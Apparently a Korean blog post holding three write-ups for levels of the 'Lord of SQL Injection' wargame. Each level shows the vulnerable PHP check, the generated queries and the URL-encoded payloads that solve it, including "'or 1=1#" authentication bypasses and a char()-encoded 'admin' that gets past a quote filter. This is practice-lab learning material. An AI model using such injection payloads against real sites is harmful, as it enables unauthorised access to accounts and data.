LOS goblin writeup



지금 id에 guest가 있고, 


 if($result['id']) echo "<h2>Hello {$result[id]}</h2>"
  if(
$result['id'] == 'admin'solve("goblin");


id가 admin이 되면 풀리는 문제인듯하다!!


http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?id=admin&no=1234


이렇게 넣어도 


query : select id from prob_goblin where id='guest' and no=1234


쿼리 guest는 바뀌지 않는다. 음...guest를 어떻게 없앨까...?


처음에는 주석으로 guest를 없애서 admin을 넣는 문제인거같은데 도저히 그건 모르겠다...

지금까지 문제와는 다르게 pw가 아니라 no인데 no의 역할은 무엇일지 궁금해졌다. 


no에 1을 넣으니 아래와 같이 hello guest가 뜬다. 1 이외에 넣으니 hello guest가 사라졌다.

 


http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id='admin' 이렇게 하니 


No Quotes ~_~


이렇게 뜸.


http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id=admin


이렇게 해보니 


query : select id from prob_goblin where id='guest' and no=2 or id=admin


이렇게 추가만 되고 안됨.

그래서 찾아보니 char를 사용해서 아스키코드로 넣어주라고 함!


query : select id from prob_goblin where id='guest' and no=2 or id=char(97 100 109 105 110)


char사용법을 몰라서 이러한 뻘짓도 해보았다...뷁


http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?no=2%20or%20id=char(97,100,109,105,110)


이렇게 하면 성공!! 우왕





'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글

LOS cobolt writeup  (0) 2018.07.20
Los gremlin writeup  (0) 2018.07.20

LOS cobolt writeup


우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다. 


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234


.위와 같이 


query : select id from prob_cobolt where id='admin' and pw=md5('1234')


이렇게 나오고 1번문제 푼것과 같이 넣어보면, 


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw=


이렇게 나온다...음... 이 방법은 아닌가보다. 


  if($result['id'] == 'admin'solve("cobolt");

  elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>"
  
highlight_file(__FILE__); 


전과 같은 방법을 쓰니 admin이 아니라 id가 rubiya님이 뜨는것을 확인할 수 있다. 흠 그럼 admin으로 로그인을 해야 된다는건데...


그래서 admin을 넣고 뒤에는 주석처리를 해주었다.


http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%23


이렇게 하니 성공!!





'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글

LOS goblin writeup  (0) 2018.07.20
Los gremlin writeup  (0) 2018.07.20

LOS gremlin writeup


문제 확인을 해보면,


위와 같이 나와있고, GET방식으로 되어있음을 알게 된다. 


http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=yeali&pw=1234


이렇게 입력을 하면, 


query : select id from prob_gremlin where id='yeali' and pw='1234'



쿼리문이 이렇게 변경되게 된다. 


id와 pw를 성립하게 해주면 되는 문제인듯하다. 


http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id='or 1=1#&pw=


이렇게 해서 #뒤에는 주석처리를 해주려고 했으나 #이 안들어간다. url 인코딩을 해줘야 하나보다!


http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=%27or%201=1%23&pw=


이렇게 하면 성공!



'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글

LOS goblin writeup  (0) 2018.07.20
LOS cobolt writeup  (0) 2018.07.20

+ Recent posts